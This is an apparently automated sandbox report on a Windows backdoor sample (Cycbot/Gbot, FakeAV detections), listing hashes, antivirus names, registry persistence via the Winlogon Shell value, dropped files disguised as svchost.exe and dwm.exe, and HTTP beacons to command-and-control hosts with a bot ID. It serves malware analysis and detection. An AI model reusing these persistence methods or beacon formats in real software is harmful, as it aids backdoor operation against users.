Analysis Date: 2014-11-28 10:18:18
MD5: c2a0484256977f4d9d29a84e77b44fca
SHA1: dcb79290a714b2b0e39c1426370caffa6edcab3a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 85b5beedabbb7fb5276989d8031de8a8 sha1: b8f560c59eea4b58f8722f4d1037faa5d2dca965 size: 60928
Section .rdata: md5: c5d4ea4186518a9204dcc070425a0fe2 sha1: 35b73bad002d952e2e6be29ff35fa1b0f4ee6c7c size: 2048
Section .data: md5: fd83ad91107c18a1da5ba6323476279a sha1: 68cd0021854555a4f7207e3403c72ea499688c17 size: 48640
Section .rsrc: md5: b6a4b5f267ada79a6e5cbccc0986e862 sha1: f6a4941c5320d799a39d51ca11ca24168751417d size: 1024
Timestamp: 2005-10-03 01:54:43
Version:
  LegalCopyright: Copyright (C) 2010
  ProductVersion: 1, 0, 0, 2
  PrivateBuild: 1121
  FileVersion: 1, 0, 0, 2
  FileDescription: MS Shell
PEhash: fd35b870d5346181c011930fded0d04637c2967e
IMPhash: 61650c5eb213852aa7cdf244ca36c5d0
AV 360 Safe: Gen:Heur.Conjar.9
AV Ad-Aware: Gen:Heur.Conjar.9
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.A.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Heur.Conjar.9
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: WIN.Trojan.Agent-1506
AV Dr. Web: Trojan.Siggen2.7324
AV Emsisoft: Gen:Heur.Conjar.9
AV Eset (nod32): Win32/Kryptik.HVW
AV Fortinet: W32/FakeAV.BZD!tr
AV Frisk (f-prot): W32/Goolbot.A.gen!Eldorado
AV F-Secure: Gen:Heur.Conjar.9
AV Grisoft (avg): Cryptic.BFI
AV Ikarus: Trojan.Win32.FakeAV
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Packed.Win32.Krap.hy
AV MalwareBytes: Backdoor.Gbot
AV Mcafee: BackDoor-EXI
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.9
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYBOT.SMA
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: www.google.com
Winsock DNS: xinmin.cn
Winsock DNS: 127.0.0.1
Winsock DNS: checkserverstatux.com
Winsock DNS: whysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNS: www.google.com (Type: A) ➝ 173.194.125.52
DNS: www.google.com (Type: A) ➝ 173.194.125.48
DNS: www.google.com (Type: A) ➝ 173.194.125.49
DNS: www.google.com (Type: A) ➝ 173.194.125.50
DNS: www.google.com (Type: A) ➝ 173.194.125.51
DNS: protectyourpc-11.com (Type: A) ➝ 74.200.250.181
DNS: xinmin.cn (Type: A) ➝ 222.73.115.218
DNS: checkserverstatux.com (Type: A)
DNS: whysohardx.com (Type: A)
HTTP GET: http://www.google.com/
  User-Agent:
HTTP GET: http://www.google.com/
  User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://xinmin.cn/2010/10/10/20101010095345843724.jpg?tq=gHZutDyMv5rJejPia9nrmsl6giWz%2BJZbVyA%3D
  User-Agent: gbot/2.3
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_7&n=0&extra=0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1032 ➝ 173.194.125.52:80
Flows TCP: 192.168.1.1:1033 ➝ 173.194.125.52:80
Flows TCP: 192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1035 ➝ 222.73.115.218:80
Flows TCP: 192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1037 ➝ 74.200.250.181:80

Raw Pcap

Strings